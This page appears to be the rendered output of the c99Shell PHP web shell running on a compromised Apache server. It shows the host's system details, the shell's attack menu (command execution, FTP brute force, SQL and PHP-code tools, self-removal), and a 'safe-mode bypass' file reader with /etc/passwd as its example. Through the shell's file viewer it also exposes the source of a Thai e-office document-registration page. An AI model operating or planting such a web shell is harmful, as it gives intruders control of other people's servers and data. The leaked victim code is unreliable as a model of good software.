!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     editRegisDoc.php (26.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clsSysConfig.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);


$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp2 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDt2 = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDatt = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oSys = new sysConfig($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();


if(
$_SESSION['DLCID'] && $_SESSION['one_position']!="1"){ include_once "selectposition.php";
?>

<?
    $oDlc
->SearchByKey($_SESSION['DLCID']); $oDlc->GetRecord(); 
    if(
$_SESSION['DLCIDSECOND']=="Y"){
        
$oDlc3->SearchByKey($_SESSION['DLCIDSECONDID']); $oDlc3->GetRecord(); 
        
$mypersonId=$oDlc3->personId;
    }else{
        
$mypersonId=$oDlc->personId;
    }    
    
$oDoc->SearchByKey($DocID); $oDoc->GetRecord(); 
    
$oRs->SearchByKey($DrsID); $oRs->GetRecord(); 
    
$oSys->RSsysConfig();  $oSys->GetRecord();
    if(
$DocfCir==""){ $DocfCir=$oDoc->DocfCir; }
?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<script src="getinfo.js"></script>
<script language="javascript" type="text/javascript">
<!--
function startUpload(){
      document.getElementById('f1_upload_process').style.visibility = 'visible';
     // document.getElementById('f1_upload_form').style.visibility = 'hidden';   
      document.getElementById('f1_upload_process').innerHTML ='.....กำลังอัพโหลดไฟล์....';
      return true;
}
function startDel(a){
        var agree=confirm("คุณต้องการลบแฟ้มหนังสือแน่นอนใช่หรือไม่ ?");
        if (agree){
              document.getElementById('method2').value="del";
              document.getElementById('selectdel').value=a;
              document.gg.submit();  
        }else{
            return false ;
        }
}
function stopUpload(myresult,caseerror,a){
      var result = '';
      if (myresult == 'yes'){
         result = '<span >'+caseerror+'<\/span><br/><br/>'+a;
      }
      else if(myresult == 'no') {
         result = '<span ><font size=2 color=red>*** '+caseerror+' ***</font><\/span><br/><br/>'+a;
      }
      document.getElementById('f1_upload_process').style.visibility = 'hidden';
      document.getElementById('f1_upload_form').innerHTML = result;
      document.getElementById('f1_upload_form').style.visibility = 'visible';      
      return true;   
}
function setLoading(){
    document.getElementById('f1_upload_process').innerHTML = '';
}
//-->
</script>  

</head>
<body OnLoad="JavaScript:setLoading();">
<table  width="100%"  align="center">
<tr><td >
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="regisDoc.php">ลงทะเบียนใหม่/เสนอหนังสือ</a>
      <img src="../picture/ico3.gif" width="10" border="0" align="absmiddle">ข้อมูลทะเบียนหนังสือ</font>
    </font></legend><br>
        <form name="ff"   id="frmUpload" METHOD="POST" action="processRegisterDoc.php">
      <table align="center" width="95%" >
        <tr>
          <td width="68%" height="25" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_19"]; ?>">
            <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="3"><strong> 
            &nbsp;ข้อมูลทะเบียนหนังสือ: </strong></font> 
            <font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="3"><strong>
            <?   if($RsID==1){    
                        echo 
$oRSt->SearchShowRsName(1); 
                    }else if(
$RsID==2){   
                        echo 
$oRSt->SearchShowRsName(2); 
                    }else if(
$RsID==4){  
                        echo 
$oRSt->SearchShowRsName(4); 
                    }else if(
$RsID==5){  
                        echo 
$oRSt->SearchShowRsName(5); 
                    }
            
?>
            </strong></font>
            &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="3"><strong> 
            &nbsp;ชนิดหนังสือ: </strong></font>
            <font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="3"><strong>
              <? $oDt->SearchByKey($DtID);
                     
$oDt->GetRecord();
                     echo 
$oDt->DtName;
            
?>
            </strong></font>
            <input name="RsID" id="RsID" type="hidden" value="<?php echo $RsID?>">
            <input name="DtID" id="DtID" type="hidden" value="<?php echo $DtID?>">
                     </td>
    </tr>
      </table>
      <table width="95%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#DADADA">
      <? if($caseeditdocforsign==1){ ?>
      <tr><td  height="25" colspan="3"><b>&nbsp;<font size="2"><img src="../picture/incomplete_ico.gif"  border="0"  title="แก้ไขข้อมูลลงทะเบียน" > แก้ไขหนังสือเสนอเพื่อลงนาม</font></b></td></tr>
     <? }?>
      <tr><td align=right colspan=3 style="FONT-SIZE: 13pt;"><!-- <?  if($RsID=="2"){?><a  style="cursor:pointer;" onClick="requestDocRegisfromCenter('<? echo $oDoc->DocID?>')">[ขอเลขทะเบียนส่งจากสป.]</a><? ?> --></td></tr>
    <? if($DtID==|| $DtID==|| $DtID==|| $DtID==14 || $DtID==15){?>  
     <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>เลขทะเบียน<? echo ShowNameRSDoc2($RsID);?></strong></td>
            <td width="0%" align="center"><strong>:</strong></td>
            <td style="FONT-SIZE: 15pt;">&nbsp;<?php echo a2th($oDoc->DocTypeNo);?>&nbsp;<input name="DocTypeNo2"  id="DocTypeNo2" type="hidden"  value="<?php echo $DocTypeNo2;?>"></td>
    </tr>
    <? ?>

    <? if($DtID!="15"){ 
                
$myDocTypeNo=$oDoc->DocTypeNo;
                
$mydeptId=$oDlc->deptId;
                
$myuseMainDocNo=$oDoc->useMainDocNo;
                
$myDocNo=$oDoc->DocNo;
      
?>
     <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDocNo($DtID); ?></strong></td>
             <td width="0%" align="center"><strong>:</strong></td>
            <td>
                                <div id="showRegister1" ><? include("showSelectDocNoRegisterEdit.php");?></div>
            </td>
    </tr>
    <? ?>


     <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDate2($DtID); ?></strong></td>
             <td width="0%" align="center"><strong>:</strong></td><td>
            <? if($DocDate==""){  
                             if(
$oDoc->DocDate!="" && $oDoc->DocDate!="0000-00-00"){ ?> 
                                        <script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo splitDateDb($oDoc->DocDate,"/");?>');</script>
                <?      }else{  ?><script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? ?>
            <? }else{ 
                         if(
$DocDate!="" && $DocDate!="0000-00-00"){ ?> 
                                        <script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo $DocDate;?>');</script>
                <?      }else{  ?><script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? 
                   } 
?>
            </td>
    </tr>
     <? //if($DtID!=13){ ?>
      <tr ><td width="21%" height="28" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>" >&nbsp;&nbsp;<strong><? echo ShowNameSubject($DtID); ?></strong></td>
            <td width="0%" align="center"><strong>:</strong></td><td ><input name="DocSubject" id="DocSubject" type="text" style="" size="70" maxlength="255" value="<? if($DocSubject==""){  if($oDoc->DocSubject!=""){ echo  a2th($oDoc->DocSubject);  }}else{  if($DocSubject!=""){ echo  a2th($DocSubject);  }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocSubject')"></td>
    </tr>
    <? //} ?>
    <? if($DtID==|| $DtID==||  $DtID==14 || $DtID==13){?>  
      <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameFrom($DtID); ?></strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocFrom" id="DocFrom" type="text" style="" size="70" maxlength="255" value="<? if($DocFrom==""){    if($oDoc->DocFrom!=""){ echo  a2th($oDoc->DocFrom);  } }else{  if($DocFrom!=""){ echo  a2th($DocFrom);  }  } ?>"    <?  if($RsID=="2" || $DtID=="13"){ ?> disabled<?   ?> onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocFrom')">
            <?  if($RsID=="2" || $DtID=="13"){  $checkNameFrom=1?> <input name="DocFrom" id="DocFrom" type="hidden" value="<? if($DocFrom==""){   if($oDoc->DocFrom!=""){ echo  $oDoc->DocFrom;  } }else{  if($DocFrom!=""){ echo  $DocFrom;  }  } ?>"><? ?>
            </td>
       </tr>
    <? ?>
    <? if(($DtID=="3" || $DtID=="15") && $RsID=="4"){?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>จาก</strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td >&nbsp;<? echo searchDeptDlcID($DLCID); ?><input name="DocFrom" id="DocFrom" type="hidden" value="<? echo searchDeptDlcID($DLCID); ?>"></td>
      </tr>
    <? }  ?>    
    <? if($DtID==13){?>  
      <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชื่อผู้ได้รับการรับรอง</strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="CertificatePs" id="CertificatePs" type="text" style="" size="70" maxlength="255" value="<? if($CertificatePs==""){   if($oDoc->CertificatePs!=""){   echo $oDoc->CertificatePs; } }else{ if($CertificatePs!=""){   echo $CertificatePs; }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','CertificatePs')"></td>
       </tr>
    <? ?>
    <? if($DtID==|| $DtID==2  || $DtID==14 || $DtID==|| $DtID==15){?>
               <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? if($DtID==|| $DtID==15){   echo "เรียน"; }else{  echo "ถึง"; } ?></strong></td>
                        <td width="0%" align="center"><strong>:</strong></td>
                    <td ><? if($DocfCir==""){    $DocfCir=$oDoc->DocfCir; }   ?><div id="showRegister2" ><? include("showSelectDocToRegisterEdit.php");?></div></td>        
                  </tr>
    <? }?>
    <? if(($DtID==|| $DtID==2) && ($RsID=="2" || $RsID=="1")){?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึง</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td><input name="DocRef" id="DocRef" type="text" style="" size="70" maxlength="255"  value="<? if($DocRef!=""){     echo a2th($DocRef);   }else{   echo $oDoc->DocRef;} ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocRef')">
            <a  style="cursor:pointer;" onClick="editDocRef('<?  echo $RsID?>')"><img src="../picture/search.gif" title="ค้นหา"  border="0" ></a>        
                </td>
    </tr>
    
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>สิ่งที่ส่งมาด้วย</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td><input name="DocOther" id="DocOther" type="text" style="" size="70" maxlength="255" value="<? if($DocOther==""){ if($oDoc->DocOther!=""){   echo $oDoc->DocOther; } }else{ if($DocOther!=""){   echo a2th($DocOther); } }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocOther')"></td>
    </tr>
    <? ?>
    <? if($DtID==&& $RsID=="4"){
                
$oDlc2->SearchByKey($DLCID); $oDlc2->GetRecord(); 
                
$oDlp2->SearchByKey($oDlc2->DlpID);  $oDlp2->GetRecord();
                if(
$oDlp2->DlpPID!="0"){ 
                    
$DlcPS2=$DLCID;
                 }else{
                    
$DlcPS2=$oDlc2->SearchDlc2($oDlc2->DlcSeq,$oDlp2->DlpPID,$oDlc2->deptId);
                }
    
?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึงหนังสือเพื่อตอบกลับ</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td><input name="DocRefAns" id="DocRefAns" type="text" style="" size="70" maxlength="255"  value="<? echo $oDoc->DocRefAns;?>"  onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocRefAns')"> 
              <a  style="cursor:pointer;" onClick="editDocRefAns('<? echo $DLCID?>','<? echo $DlcPS2;  ?>','<? echo $useMainDocNo?>')"><img src="../picture/search.gif" title="ค้นหา" style="cursor:pointer;"  border="0" ></a> 
            </td>
    </tr>
    <? ?>
    <? if($DtID==|| $DtID==|| $DtID==|| $DtID==14 || $DtID==15){?> 
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นความเร็ว</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td>
            <td> 
              <select name="DslID" id="DslID" >
                      <? $oDsl->RSDocSpeedLevel();
                            while(
$oDsl->GetRecord()){?>
                      <option value="<? echo $oDsl->DslID;?><? if($DslID==""){ if($oDoc->DslID==$oDsl->DslID){ echo "selected";    } }else{  if($DslID==$oDsl->DslID){ echo "selected"; } }?>><? echo $oDsl->DslName?></option>
                      <? ?>
                    </select></td></tr>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นความลับ</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td>
                <select name="DclID" id="DclID" >
                      <? $oDcl->RSDocSecretLevel();
                            while(
$oDcl->GetRecord()){?>
                      <option value="<? echo $oDcl->DclID;?><? if($DclID==""){ if($oDoc->DclID==$oDcl->DclID){ echo "selected";    } }else{  if($DclID==$oDcl->DclID){ echo "selected"; } }?>><? echo $oDcl->DclName?></option>
                      <? ?>
                    </select></td>
    </tr>
    <? ?>
    <? if($RsID==|| $RsID==2){ ?>
          <tr >
            <td width="22%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>หน่วยงานเจ้าของเรื่อง</strong></td>
            <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocDeptOwner" id="DocDeptOwner" type="text" style="" size="70" maxlength="255" value="<? if($DocDeptOwner==""){  if($oDoc->DocDeptOwner!=""){ echo  a2th($oDoc->DocDeptOwner);  }}else{  if($DocDeptOwner!=""){ echo  a2th($DocDeptOwner);  }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocDeptOwner')"></td>
          </tr>        
          <tr >
            <td width="22%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>โทรศัพท์เจ้าของเรื่อง</strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocTelOwner" id="DocTelOwner" type="text" style="" size="70" maxlength="255" value="<? if($DocTelOwner==""){  if($oDoc->DocTelOwner!=""){ echo  a2th($oDoc->DocTelOwner);  }}else{  if($DocTelOwner!=""){ echo  a2th($DocTelOwner);  }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocTelOwner')"></td>
      </tr>    
          <tr >
            <td width="22%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>โทรสารเจ้าของเรื่อง</strong></td>
            <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocFaxOwner" id="DocFaxOwner" type="text" style="" size="70" maxlength="255" value="<? if($DocFaxOwner==""){  if($oDoc->DocFaxOwner!=""){ echo  a2th($oDoc->DocFaxOwner);  }}else{  if($DocFaxOwner!=""){ echo  a2th($DocFaxOwner);  }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocFaxOwner')"></td>
          </tr>        
          <tr >
            <td width="22%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>สำเนาส่ง</strong></td>
            <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocCopySend" id="DocCopySend" type="text" style="" size="70" maxlength="255" value="<? if($DocCopySend==""){  if($oDoc->DocCopySend!=""){ echo  a2th($oDoc->DocCopySend);  }}else{  if($DocCopySend!=""){ echo  a2th($DocCopySend);  }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocCopySend')"></td>
          </tr>    
          <tr >
            <td width="22%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>การติดต่อทางอิเล็กทรอนิกส์</strong></td>
            <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocContactE" id="DocContactE" type="text" style="" size="70" maxlength="255" value="<? if($DocContactE==""){  if($oDoc->DocContactE!=""){ echo  a2th($oDoc->DocContactE);  }}else{  if($DocContactE!=""){ echo  a2th($DocContactE);  }  }?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','DocContactE')"></td>
          </tr>
    <? }?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>หมายเหตุ</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td>
            <td> 
              <textarea name="DocShortDesc" id="DocShortDesc" cols="70" rows="4" <? echo showtextarea('DocShortDesc',$InputThai); ?>><? if($DocShortDesc==""){   if($oDoc->DocShortDesc!=""){ echo $oDoc->DocShortDesc;  } }else{  if($DocShortDesc!=""){ echo a2th($DocShortDesc);  } } ?></textarea></td></tr>
    <tr >
            <td width="21%" height="24">&nbsp;&nbsp;</td>
                   <td width="0%" align="center">&nbsp;</td>
            <td>
            <? if($RsID=="2"){?>
            <input name="DocSendReal" id="DocSendReal" type="checkbox" value="Y"  onClick="checkdocsendreal()" <?  if($DocSendReal==""){    if($oDoc->DocSendReal=="Y"){ echo "checked"; } }else{  if($DocSendReal=="Y"){ echo "checked"; }  }?>>&nbsp;<b>ส่งหนังสือตัวจริงตามไปด้วย</b>
            <? }else{ ?>
            <input name="DocSendReal" id="DocSendReal" type="hidden" value="">
            <? }?>
                <? if($DtID!="15"){  $oDt2->SearchByKey($DtID); $oDt2->GetRecord();  ?>
                <input name="endDoc" id="endDoc" type="checkbox" value="Y" <?  if($endDoc==""){    if($oDoc->endDoc=="Y"){ echo "checked"; } }else{  if($endDoc=="Y"){ echo "checked"; }  } if($RsID=='2' && $oSys->sendAllNode!='Y'){   echo " disabled";  }  ?> onClick="checkenddoc()">
              &nbsp;<strong>ยุติหนังสือ</strong><? if($RsID=='2' && $oSys->sendAllNode!='Y'){  ?><input name="endDoc" id="endDoc" type="hidden" value="Y">  <?  }?>
              <? ?>
              
              
              <? if(($RsID=="1" || $RsID=="4") && ($DtID=="1" || $DtID=="2" || $DtID=="3")){  ?>
              <input name="DrsSendToPs" id="DrsSendToPs" type="checkbox" value="Y" <?  if($DrsSendToPs==""){    if($oDoc->sendToPs=="Y"){ echo "checked"; } }else{  if($DrsSendToPs=="Y"){ echo "checked"; }  }?>>
              &nbsp;<strong>ส่งด่วน (ส่งถึงบุคคลทันที)</strong><? ?>
              </td>
    </tr>
    <tr><td>&nbsp;</td></tr>
        <tr>
            <td colspan="3">&nbsp;</td>
          </tr>
        <tr >
            <td height="24" colspan="3" align="center">
                <input type="submit" name="registerDoc" value="<? if($caseeditdocforsign==1){ echo "บันทึกและแจ้งแก้ไข";}else{ echo "บันทึกการลงทะเบียน"; }?>" onClick="return checkFormat('<? echo $insertDocNo?>','<? echo $countAllDoc?>','<? echo $caseeditdocforsign;?>');">
                <? if($caseeditdocforsign==1){ ?>
                 <input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'statusDocforSign.php'">
                <? }else{ ?>
                <input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'regisDoc.php?RsID=<? echo $RsID;?>&DtID=<? echo $DtID?>&selectpredocdatevalue=<? echo $selectpredocdatevalue;?>&searchpredocdate=<? echo $searchpredocdate?>&folderstaff2=<? echo $folderstaff2;?>&forfolderstaff2=<? echo $forfolderstaff2;?>'">            
                <? ?>
                <input name="DocID" type="hidden" value="<?php echo $DocID?>">
                <input name="DrsID" type="hidden" value="<?php echo $DrsID?>">
                <input name="DlcID" type="hidden" value="<?php echo $DLCID?>">
                <input name="DtmpID" type="hidden" value="<?php echo $DtmpID?>">
                <input name="personId" type="hidden" value="<?php echo $mypersonId?>">
                <input name="deptId" type="hidden" value="<?php echo $oDlc->deptId?>">
                <input name="DocGroup" type="hidden" value="<?php echo $MaxDocGroup?>">
                <input name="fDelete" type="hidden" value="<?php echo $oDlc->fDelete?>">
                 <input type="hidden" name="folderstaff2" id="folderstaff2" value="<? echo $folderstaff2?>">
                <input name="searchPreName" type="hidden" value="<?php echo $searchPreName?>">
                <input name="searchPreNo" type="hidden" value="<?php echo $searchPreNo?>">
                <input name="searchPreTypeNoF" type="hidden" value="<?php echo $searchPreTypeNoF?>">
                <input name="searchPreTypeNoT" type="hidden" value="<?php echo $searchPreTypeNoT?>">
                <input type="hidden" name="caseeditdocforsign"  id="caseeditdocforsign" value="<? echo $caseeditdocforsign?>">
                <input type="hidden" name="dfID"  id="dfID" value="<? echo $dfID?>">
                <input name="DrsID" type="hidden" value="<?php echo $DrsID?>">
                <?  if($DocRefAnsID=="" && $DocRefAns==""){   $DocRefAnsID=$oDoc->DocRefAnsID;  }else if($DocRefAnsID!="" && $DocRefAns!=""){   $DocRefAnsID=$DocRefAnsID;    }  ?>
                <input name="DocRefAnsID" id="DocRefAnsID" type="hidden" value="<?php echo $DocRefAnsID?>">
                <input type="hidden" name="method" id="method"  value="<? echo $method?>">
                </td></tr>
      </table></form>
      <form name="gg"   action="showSelectUploadDoc.php" method="post" enctype="multipart/form-data" onsubmit="startUpload();" target="upload_target">
<table width="95%" align="center">  
    <tr><td><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="3"><strong><img src="../picture/official_letter.gif"   border="0" > แฟ้มหนังสือ</strong></font><br><hr color="#000099"></td></tr> 
    <tr>
            <td width="79%">
            <table width="100%" align="left"><tr><td width="70%">
            <? //------------table upload file-------------------------  ?>
            <div id="f1_upload_form" align="center"><? include("editRegisterUploadDoc.php"); echo manageDocAtt($DLCID,$DocID);?></div></td>
                        <td width="40%">&nbsp;</td>
                      </tr>
                <?
                            $oSys
->RSsysConfig();
                            
$oSys->GetRecord();
                            
$oSys->filesizebyte;
                            
$sizefileM=($oSys->filesizebyte/1024/1024);
                
?>
                <tr><td><br><table width="80%"  border=1 cellpadding="0" cellspacing="0" style="border-collapse:collapse" bordercolor="#6CABF9">
                <tr>
                <td>
                     <div id="f1_upload_process"><br/></div>                    
                </td>
                </tr>
                <tr>
                        <td  height="75"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_20"]; ?>">
                        <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>">
                        &nbsp;คลิ๊กที่ปุ่ม 
                          "Browse.." เพื่อเลือกแฟ้ม จากนั้น<br>&nbsp;คลิ๊กที่ปุ่ม "เพิ่มแฟ้ม" 
                          เพื่อเพิ่มแฟ้มเข้าในรายการ</font> 
                          <input name="fileupload" type="file" size="30" /><input type="submit" name="submitBtn" value="เพิ่มแฟ้ม" />
                          <iframe id="upload_target" name="upload_target" src="#" style="width:0;height:0;border:0px solid #fff;"></iframe>
                  </td>
                </tr>
              </table>
                                        <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">หมายเหตุ***&nbsp;ขนาดแฟ้มไม่เกิน 
                          <? echo $sizefileM?> MB   ,ชื่อแฟ้มไม่ควรจะประกอบด้วย 
                          จุด(.) และ ,</font> 
              </td><td>&nbsp;</td>
                      </tr></table>
    </td></tr>
    </table><br>
                    <input name="DocID" type="hidden" value="<?php echo $DocID?>">
                <input name="DlcID" type="hidden" value="<?php echo $DLCID?>">
                <input name="method2" type="hidden" id="method2">
                <input name="selectdel" type="hidden" id="selectdel">
    </form>      
</fieldset>  <table width="95%" border="0" align="center">
        <tr> 
          <td width="76" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp;<strong>หมายเหตุ 
            : </strong>&nbsp;</font></td>
          <td width="618" align="left"><img src="../picture/allregistered_ico.gif"   border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกเพื่อเปิดดูแฟ้มหนังสือ </font></td>
        </tr>
            <tr> 
          <td width="76">&nbsp;</td>
          <td width="618" align="left"><img src="../picture/delete1.gif"   border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกเพื่อลบแฟ้มหนังสือที่ไม่ต้องการ </font></td>
        </tr></table>
</td>
</tr>
</table>
</body>
</html>
<? }else{ include_once "unselectposition.php"; } ?>
<script language="javascript">
function editDocRef(RsID){ 
            FileName = "editDocRefTable.php?RsID=<?  echo $RsID;?>";
            var w=350;  
            var h=300;
            strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption); 
        
}
function checkFormat(q,r,caseeditdocforsign){
        if(q==1){
            if(document.ff.DocNo.value == ""){
                alert("กรุณากรอกที่หนังสือ");
                document.ff.DocNo.focus();
                return false;
            }
        }
        if(caseeditdocforsign==1){
            var agree=confirm("คุณต้องการบันทึกและแจ้งแก้ไขหนังสือใช่หรือไม่ ?");
        }else{
            var agree=confirm("คุณต้องการบันทึกการลงทะเบียนแน่นอนใช่หรือไม่ ?");
        }
        
        if (agree){
            if(caseeditdocforsign==1){
                document.ff.method.value="editRegisterDocforsign";
            }else{
                document.ff.method.value="editRegisterDoc";
            }
            document.ff.action="processRegisterDoc.php"
            document.ff.target="";
            return true;
        }else{
            return false ;
        }
}
function editDocRefAns(p,q){   
    RsID=document.ff.RsID.value;
            FileName = "editDocRefAnsTable.php?DLCID="+p+"&DlcPS2="+q+"&RsID=<?  echo $RsID;?>";
            var w=390;  
            var h=300;
            strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption); 
            
}
function checkenddoc(){
    if(document.ff.endDoc.checked){
        document.ff.DocSendReal.checked=false;
    }
}
function checkdocsendreal(){
    if(document.ff.DocSendReal.checked){
        document.ff.endDoc.checked=false;
    }
}
function addSendOutDept(){ 
        FileName = "addSendOutDeptTable.php";
            var w=350;  
            var h=300;
            strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption); 
        
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0101 ]--